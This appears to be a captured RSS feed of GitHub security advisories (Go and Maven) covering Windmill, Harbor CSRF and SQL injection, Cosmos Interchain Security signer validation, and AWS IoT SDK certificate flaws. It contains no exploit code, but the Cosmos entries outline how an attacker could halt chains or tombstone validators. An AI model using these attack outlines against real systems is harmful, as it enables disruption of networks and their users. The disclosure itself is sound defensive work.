<li><a href="https://app.safebase.io/portal/71ccd717-aa2d-4a1e-942e-c768d37e9e0c/preview?product=%5B%E2%80%A6%5D942e-c768d37e9e0c&amp;tcuUid=1d505bda-9a38-4ca5-8724-052e6337f34d">https://app.safebase.io/portal/71ccd717-aa2d-4a1e-942e-c768d37e9e0c/preview?product=%5B%E2%80%A6%5D942e-c768d37e9e0c&amp;tcuUid=1d505bda-9a38-4ca5-8724-052e6337f34d</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODCOMPONENTSSERVERGOPKGLIB-7452074">https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODCOMPONENTSSERVERGOPKGLIB-7452074</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODCOMPONENTSWSPROXYPKGPROXY-7452075">https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODCOMPONENTSWSPROXYPKGPROXY-7452075</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSAUTH-7452076">https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSAUTH-7452076</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSPUBLICAPISERVER-7452077">https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSPUBLICAPISERVER-7452077</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSSERVER-7452078">https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGITPODIOGITPODINSTALLINSTALLERPKGCOMPONENTSSERVER-7452078</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-JS-GITPODGITPODPROTOCOL-7452079">https://security.snyk.io/vuln/SNYK-JS-GITPODGITPODPROTOCOL-7452079</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2024-2997">https://pkg.go.dev/vuln/GO-2024-2997</a></li>
<li><a href="https://github.com/advisories/GHSA-8pgc-65mj-53h5">https://github.com/advisories/GHSA-8pgc-65mj-53h5</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-8pgc-65mj-53h5</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-8pgc-65mj-53h5</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/windmill-labs/windmill] Windmill HTTP Request users.rs excessive authentication in github.com/windmill-labs/windmill</title>
<description><p>A vulnerability was found in Windmill 1.380.0. It has been classified as problematic. Affected is an unknown function of the file backend/windmill-api/src/users.rs of the component HTTP Request Handler. The manipulation leads to improper restriction of excessive authentication attempts. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 1.390.1 is able to address this issue. The patch is identified as acfe7786152f036f2476f93ab5536571514fa9e3. It is recommended to upgrade the affected component.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8462">https://nvd.nist.gov/vuln/detail/CVE-2024-8462</a></li>
<li><a href="https://github.com/windmill-labs/windmill/commit/acfe7786152f036f2476f93ab5536571514fa9e3">https://github.com/windmill-labs/windmill/commit/acfe7786152f036f2476f93ab5536571514fa9e3</a></li>
<li><a href="https://github.com/windmill-labs/windmill/releases/tag/v1.390.1">https://github.com/windmill-labs/windmill/releases/tag/v1.390.1</a></li>
<li><a href="https://vuldb.com/?ctiid.276630">https://vuldb.com/?ctiid.276630</a></li>
<li><a href="https://vuldb.com/?id.276630">https://vuldb.com/?id.276630</a></li>
<li><a href="https://vuldb.com/?submit.401826">https://vuldb.com/?submit.401826</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2024-3118">https://pkg.go.dev/vuln/GO-2024-3118</a></li>
<li><a href="https://github.com/advisories/GHSA-g6q4-w3j3-jfc4">https://github.com/advisories/GHSA-g6q4-w3j3-jfc4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-g6q4-w3j3-jfc4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-g6q4-w3j3-jfc4</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/goharbor/harbor] Cross-site Request Forgery (CSRF) in Cloud Native Computing Foundation Harbor</title>
<description><p>Cure53 has discovered that the Harbor web interface does not implement protection mechanisms against Cross-Site Request Forgery (CSRF). By luring an authenticated user onto a prepared third-party website, an attacker can execute any action on the platform in the context of the currently authenticated victim.</p>
<p>The vulnerability was immediately fixed by the Harbor team and all supported versions were patched.</p>
<p>Successful exploitation of this issue will lead to 3rd parties executing actions on the platform of behalf of authenticated users and administrators.</p>
<p>If your product uses the affected releases of Harbor, update to version 1.8.6 and 1.9.3 to patch this issue immediately.</p>
<p><a href="https://github.com/goharbor/harbor/releases/tag/v1.8.6">https://github.com/goharbor/harbor/releases/tag/v1.8.6</a>
<a href="https://github.com/goharbor/harbor/releases/tag/v1.9.3">https://github.com/goharbor/harbor/releases/tag/v1.9.3</a></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/goharbor/harbor/security/advisories/GHSA-gcqm-v682-ccw6">https://github.com/goharbor/harbor/security/advisories/GHSA-gcqm-v682-ccw6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19025">https://nvd.nist.gov/vuln/detail/CVE-2019-19025</a></li>
<li><a href="https://github.com/goharbor/harbor/security/advisories">https://github.com/goharbor/harbor/security/advisories</a></li>
<li><a href="https://tanzu.vmware.com/security/cve-2019-19025">https://tanzu.vmware.com/security/cve-2019-19025</a></li>
<li><a href="https://github.com/advisories/GHSA-rffr-c932-cpxv">https://github.com/advisories/GHSA-rffr-c932-cpxv</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-rffr-c932-cpxv</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-rffr-c932-cpxv</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/goharbor/harbor] Cross-site Request Forgery (CSRF) in Cloud Native Computing Foundation Harbor</title>
<description><p>Cure53 has discovered that the Harbor web interface does not implement protection mechanisms against Cross-Site Request Forgery (CSRF). By luring an authenticated user onto a prepared third-party website, an attacker can execute any action on the platform in the context of the currently authenticated victim.</p>
<p>The vulnerability was immediately fixed by the Harbor team and all supported versions were patched.</p>
<p>Successful exploitation of this issue will lead to 3rd parties executing actions on the platform of behalf of authenticated users and administrators.</p>
<p>If your product uses the affected releases of Harbor, update to version 1.8.6 and 1.9.3 to patch this issue immediately.</p>
<p><a href="https://github.com/goharbor/harbor/releases/tag/v1.8.6">https://github.com/goharbor/harbor/releases/tag/v1.8.6</a>
<a href="https://github.com/goharbor/harbor/releases/tag/v1.9.3">https://github.com/goharbor/harbor/releases/tag/v1.9.3</a></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/goharbor/harbor/security/advisories/GHSA-gcqm-v682-ccw6">https://github.com/goharbor/harbor/security/advisories/GHSA-gcqm-v682-ccw6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19025">https://nvd.nist.gov/vuln/detail/CVE-2019-19025</a></li>
<li><a href="https://github.com/goharbor/harbor/security/advisories">https://github.com/goharbor/harbor/security/advisories</a></li>
<li><a href="https://tanzu.vmware.com/security/cve-2019-19025">https://tanzu.vmware.com/security/cve-2019-19025</a></li>
<li><a href="https://github.com/advisories/GHSA-rffr-c932-cpxv">https://github.com/advisories/GHSA-rffr-c932-cpxv</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-rffr-c932-cpxv</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-rffr-c932-cpxv</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/goharbor/harbor] SQL Injection in Cloud Native Computing Foundation Harbor</title>
<description><p>Cloud Native Computing Foundation Harbor prior to 1.8.6 and 1.9.3 allows SQL Injection via user-groups in the VMware Harbor Container Registry for the Pivotal Platform.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/goharbor/harbor/security/advisories/GHSA-qcfv-8v29-469w">https://github.com/goharbor/harbor/security/advisories/GHSA-qcfv-8v29-469w</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19029">https://nvd.nist.gov/vuln/detail/CVE-2019-19029</a></li>
<li><a href="https://github.com/goharbor/harbor/security/advisories">https://github.com/goharbor/harbor/security/advisories</a></li>
<li><a href="https://tanzu.vmware.com/security/cve-2019-19029">https://tanzu.vmware.com/security/cve-2019-19029</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2022-0853">https://pkg.go.dev/vuln/GO-2022-0853</a></li>
<li><a href="https://github.com/advisories/GHSA-jr34-mff8-pc6f">https://github.com/advisories/GHSA-jr34-mff8-pc6f</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-jr34-mff8-pc6f</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-jr34-mff8-pc6f</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/goharbor/harbor] SQL Injection in Cloud Native Computing Foundation Harbor</title>
<description><p>Cloud Native Computing Foundation Harbor prior to 1.8.6 and 1.9.3 allows SQL Injection via user-groups in the VMware Harbor Container Registry for the Pivotal Platform.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/goharbor/harbor/security/advisories/GHSA-qcfv-8v29-469w">https://github.com/goharbor/harbor/security/advisories/GHSA-qcfv-8v29-469w</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19029">https://nvd.nist.gov/vuln/detail/CVE-2019-19029</a></li>
<li><a href="https://github.com/goharbor/harbor/security/advisories">https://github.com/goharbor/harbor/security/advisories</a></li>
<li><a href="https://tanzu.vmware.com/security/cve-2019-19029">https://tanzu.vmware.com/security/cve-2019-19029</a></li>
<li><a href="https://pkg.go.dev/vuln/GO-2022-0853">https://pkg.go.dev/vuln/GO-2022-0853</a></li>
<li><a href="https://github.com/advisories/GHSA-jr34-mff8-pc6f">https://github.com/advisories/GHSA-jr34-mff8-pc6f</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-jr34-mff8-pc6f</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-jr34-mff8-pc6f</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/cosmos/interchain-security/v4] Interchain Security: The signers of ICS messages do not need to match the provider address</title>
<description><h3 id="context">Context</h3>
<p>ICS has the following four messages that enable validators on the provider chain to perform different actions:</p>
<ul>
<li><code>MsgOptIn</code> -- adds a validator to the consumer chain’s active set</li>
<li><code>MsgOptOut</code> -- removes a validator from the consumer chain’s active set </li>
<li><code>MsgAssignConsumerKey</code> -- changes the consensus key used for a validator’s operations on a consumer chain</li>
<li><code>MsgSetConsumerCommissionRate</code> -- sets a validator’s consumer-specific commission rate</li>
</ul>
<p>Normally, only the respective validators are allowed to perform these actions. </p>
<h3 id="issue">Issue</h3>
<p>The upgrade to SDK 0.50, introduced a <a href="https://docs.cosmos.network/v0.50/build/building-modules/protobuf-annotations#signer">signer</a> field to these messages. This field is used to authenticate the user sending the message to the system. However, there was no validation on the ICS side to check if the signer matches the provider address. </p>
<p>As a result, any user could opt-in, opt-out, change the commission rate, or change what public key a validator uses on a consumer chain. </p>
<p>For more context, check out the code:</p>
<ul>
<li>proto files <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52</a></li>
<li>message validation <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106</a></li>
<li>message handling <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52</a></li>
</ul>
<h3 id="severity-assessment">Severity assessment</h3>
<p>The severity assessment is based on <a href="https://github.com/interchainio/security/blob/main/resources/CLASSIFICATION_MATRIX.md">this framework</a>. </p>
<p><strong>Potential impact:</strong> Catastrophic </p>
<ul>
<li>By changing consumer keys for 1/3+ of a consumer chain's validator set, any user could cause a consumer chain to halt. Given that the consumer is down, the provider will jail provider validators for consumer downtime, so this exploit would not have impacted the provider directly. Consumer chain halts would need to be addressed by a provider-side patch.</li>
<li>By changing consumer keys on a consumer node, double signing, and submitting evidence back to the provider, any user could tombstone any provider validator. This would cause the provider's active set to change. At scale, this exploit could be applied to all active provider validators and a well-funded attacker could then run their own nodes and take over consensus on the provider and on consumer chains.</li>
</ul>
<p><strong>Likelihood:</strong> Rare</p>
<ul>
<li>The bug was discovered internally. There is no evidence that any external party has identified this vulnerability. </li>
<li>The bug has been live for two weeks with no issues. </li>
<li>All four message types are ones that only validators use, and rarely use in daily operations.</li>
<li>In the Cosmos Hub’s recent history (May - Aug), there has been only one instance of any of these message types, which was performed in accordance with chain rules.</li>
<li>The catastrophic exploits (such as tombstoning the entire validator set of the provider) are also extremely complex. They involve several operations that are not well-understood by many people, and the entire exploit must occur quickly and at-scale to avoid other node operators responding defensively.</li>
</ul>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g">https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g</a></li>
<li><a href="https://github.com/advisories/GHSA-7q74-g774-7x3g">https://github.com/advisories/GHSA-7q74-g774-7x3g</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7q74-g774-7x3g</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7q74-g774-7x3g</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/cosmos/interchain-security/v3] Interchain Security: The signers of ICS messages do not need to match the provider address</title>
<description><h3 id="context">Context</h3>
<p>ICS has the following four messages that enable validators on the provider chain to perform different actions:</p>
<ul>
<li><code>MsgOptIn</code> -- adds a validator to the consumer chain’s active set</li>
<li><code>MsgOptOut</code> -- removes a validator from the consumer chain’s active set </li>
<li><code>MsgAssignConsumerKey</code> -- changes the consensus key used for a validator’s operations on a consumer chain</li>
<li><code>MsgSetConsumerCommissionRate</code> -- sets a validator’s consumer-specific commission rate</li>
</ul>
<p>Normally, only the respective validators are allowed to perform these actions. </p>
<h3 id="issue">Issue</h3>
<p>The upgrade to SDK 0.50, introduced a <a href="https://docs.cosmos.network/v0.50/build/building-modules/protobuf-annotations#signer">signer</a> field to these messages. This field is used to authenticate the user sending the message to the system. However, there was no validation on the ICS side to check if the signer matches the provider address. </p>
<p>As a result, any user could opt-in, opt-out, change the commission rate, or change what public key a validator uses on a consumer chain. </p>
<p>For more context, check out the code:</p>
<ul>
<li>proto files <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52</a></li>
<li>message validation <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106</a></li>
<li>message handling <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52</a></li>
</ul>
<h3 id="severity-assessment">Severity assessment</h3>
<p>The severity assessment is based on <a href="https://github.com/interchainio/security/blob/main/resources/CLASSIFICATION_MATRIX.md">this framework</a>. </p>
<p><strong>Potential impact:</strong> Catastrophic </p>
<ul>
<li>By changing consumer keys for 1/3+ of a consumer chain's validator set, any user could cause a consumer chain to halt. Given that the consumer is down, the provider will jail provider validators for consumer downtime, so this exploit would not have impacted the provider directly. Consumer chain halts would need to be addressed by a provider-side patch.</li>
<li>By changing consumer keys on a consumer node, double signing, and submitting evidence back to the provider, any user could tombstone any provider validator. This would cause the provider's active set to change. At scale, this exploit could be applied to all active provider validators and a well-funded attacker could then run their own nodes and take over consensus on the provider and on consumer chains.</li>
</ul>
<p><strong>Likelihood:</strong> Rare</p>
<ul>
<li>The bug was discovered internally. There is no evidence that any external party has identified this vulnerability. </li>
<li>The bug has been live for two weeks with no issues. </li>
<li>All four message types are ones that only validators use, and rarely use in daily operations.</li>
<li>In the Cosmos Hub’s recent history (May - Aug), there has been only one instance of any of these message types, which was performed in accordance with chain rules.</li>
<li>The catastrophic exploits (such as tombstoning the entire validator set of the provider) are also extremely complex. They involve several operations that are not well-understood by many people, and the entire exploit must occur quickly and at-scale to avoid other node operators responding defensively.</li>
</ul>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g">https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g</a></li>
<li><a href="https://github.com/advisories/GHSA-7q74-g774-7x3g">https://github.com/advisories/GHSA-7q74-g774-7x3g</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7q74-g774-7x3g</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7q74-g774-7x3g</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/cosmos/interchain-security/v2] Interchain Security: The signers of ICS messages do not need to match the provider address</title>
<description><h3 id="context">Context</h3>
<p>ICS has the following four messages that enable validators on the provider chain to perform different actions:</p>
<ul>
<li><code>MsgOptIn</code> -- adds a validator to the consumer chain’s active set</li>
<li><code>MsgOptOut</code> -- removes a validator from the consumer chain’s active set </li>
<li><code>MsgAssignConsumerKey</code> -- changes the consensus key used for a validator’s operations on a consumer chain</li>
<li><code>MsgSetConsumerCommissionRate</code> -- sets a validator’s consumer-specific commission rate</li>
</ul>
<p>Normally, only the respective validators are allowed to perform these actions. </p>
<h3 id="issue">Issue</h3>
<p>The upgrade to SDK 0.50, introduced a <a href="https://docs.cosmos.network/v0.50/build/building-modules/protobuf-annotations#signer">signer</a> field to these messages. This field is used to authenticate the user sending the message to the system. However, there was no validation on the ICS side to check if the signer matches the provider address. </p>
<p>As a result, any user could opt-in, opt-out, change the commission rate, or change what public key a validator uses on a consumer chain. </p>
<p>For more context, check out the code:</p>
<ul>
<li>proto files <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52</a></li>
<li>message validation <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106</a></li>
<li>message handling <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52</a></li>
</ul>
<h3 id="severity-assessment">Severity assessment</h3>
<p>The severity assessment is based on <a href="https://github.com/interchainio/security/blob/main/resources/CLASSIFICATION_MATRIX.md">this framework</a>. </p>
<p><strong>Potential impact:</strong> Catastrophic </p>
<ul>
<li>By changing consumer keys for 1/3+ of a consumer chain's validator set, any user could cause a consumer chain to halt. Given that the consumer is down, the provider will jail provider validators for consumer downtime, so this exploit would not have impacted the provider directly. Consumer chain halts would need to be addressed by a provider-side patch.</li>
<li>By changing consumer keys on a consumer node, double signing, and submitting evidence back to the provider, any user could tombstone any provider validator. This would cause the provider's active set to change. At scale, this exploit could be applied to all active provider validators and a well-funded attacker could then run their own nodes and take over consensus on the provider and on consumer chains.</li>
</ul>
<p><strong>Likelihood:</strong> Rare</p>
<ul>
<li>The bug was discovered internally. There is no evidence that any external party has identified this vulnerability. </li>
<li>The bug has been live for two weeks with no issues. </li>
<li>All four message types are ones that only validators use, and rarely use in daily operations.</li>
<li>In the Cosmos Hub’s recent history (May - Aug), there has been only one instance of any of these message types, which was performed in accordance with chain rules.</li>
<li>The catastrophic exploits (such as tombstoning the entire validator set of the provider) are also extremely complex. They involve several operations that are not well-understood by many people, and the entire exploit must occur quickly and at-scale to avoid other node operators responding defensively.</li>
</ul>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g">https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g</a></li>
<li><a href="https://github.com/advisories/GHSA-7q74-g774-7x3g">https://github.com/advisories/GHSA-7q74-g774-7x3g</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7q74-g774-7x3g</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7q74-g774-7x3g</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/cosmos/interchain-security] Interchain Security: The signers of ICS messages do not need to match the provider address</title>
<description><h3 id="context">Context</h3>
<p>ICS has the following four messages that enable validators on the provider chain to perform different actions:</p>
<ul>
<li><code>MsgOptIn</code> -- adds a validator to the consumer chain’s active set</li>
<li><code>MsgOptOut</code> -- removes a validator from the consumer chain’s active set </li>
<li><code>MsgAssignConsumerKey</code> -- changes the consensus key used for a validator’s operations on a consumer chain</li>
<li><code>MsgSetConsumerCommissionRate</code> -- sets a validator’s consumer-specific commission rate</li>
</ul>
<p>Normally, only the respective validators are allowed to perform these actions. </p>
<h3 id="issue">Issue</h3>
<p>The upgrade to SDK 0.50, introduced a <a href="https://docs.cosmos.network/v0.50/build/building-modules/protobuf-annotations#signer">signer</a> field to these messages. This field is used to authenticate the user sending the message to the system. However, there was no validation on the ICS side to check if the signer matches the provider address. </p>
<p>As a result, any user could opt-in, opt-out, change the commission rate, or change what public key a validator uses on a consumer chain. </p>
<p>For more context, check out the code:</p>
<ul>
<li>proto files <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52</a></li>
<li>message validation <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106</a></li>
<li>message handling <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52</a></li>
</ul>
<h3 id="severity-assessment">Severity assessment</h3>
<p>The severity assessment is based on <a href="https://github.com/interchainio/security/blob/main/resources/CLASSIFICATION_MATRIX.md">this framework</a>. </p>
<p><strong>Potential impact:</strong> Catastrophic </p>
<ul>
... |
http://localhost:1200/github-advisor/data/maven - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - maven</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github-advisor/data/maven" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - maven - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Fri, 13 Sep 2024 16:32:37 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>[software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>Connections initialized by the AWS IoT Device SDK v2 for Java (versions prior to 1.3.3), Python (versions prior to 1.5.18), C++ (versions prior to 1.12.7) and Node.js (versions prior to 1.5.1) did not verify server certificate hostname during TLS handshake when overriding Certificate Authorities (CA) in their trust stores on Windows. This issue has been addressed in aws-c-io submodule versions 0.9.13 onward. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.3.3 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.5.18 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Microsoft Windows.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40828">https://nvd.nist.gov/vuln/detail/CVE-2021-40828</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/4be41394f1aee979e6f4b012fcb01eecabd0c08d">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/4be41394f1aee979e6f4b012fcb01eecabd0c08d</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/fd4c0ba04b35eab9e20c635af5548fcc5a92d8be">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/fd4c0ba04b35eab9e20c635af5548fcc5a92d8be</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-94jq-q5v2-76wj">https://github.com/advisories/GHSA-94jq-q5v2-76wj</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-861.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-861.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-94jq-q5v2-76wj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-94jq-q5v2-76wj</guid>
<author>GitHub</author>
</item>
<item>
<title>[software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user supplied Certificate Authority (CA) to the root CAs instead of overriding it on Unix systems. TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system’s default trust-store. Attackers with access to a host’s trust stores or are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case) may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The 'aws_tls_ctx_options_override_default_trust_store_*' function within the aws-c-io submodule has been updated to override the default trust store. This corrects this issue. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Linux/Unix. Amazon Web Services AWS-C-IO 0.10.4 on Linux/Unix.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40830">https://nvd.nist.gov/vuln/detail/CVE-2021-40830</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/53a36e3ac203291494120604d416b6de59177cac">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/53a36e3ac203291494120604d416b6de59177cac</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/0450ce68add7e3d05c6d781ecdac953c299c053a">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/0450ce68add7e3d05c6d781ecdac953c299c053a</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-c4rh-4376-gff4">https://github.com/advisories/GHSA-c4rh-4376-gff4</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-863.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-863.yaml</a></li>
</ul>
</description>
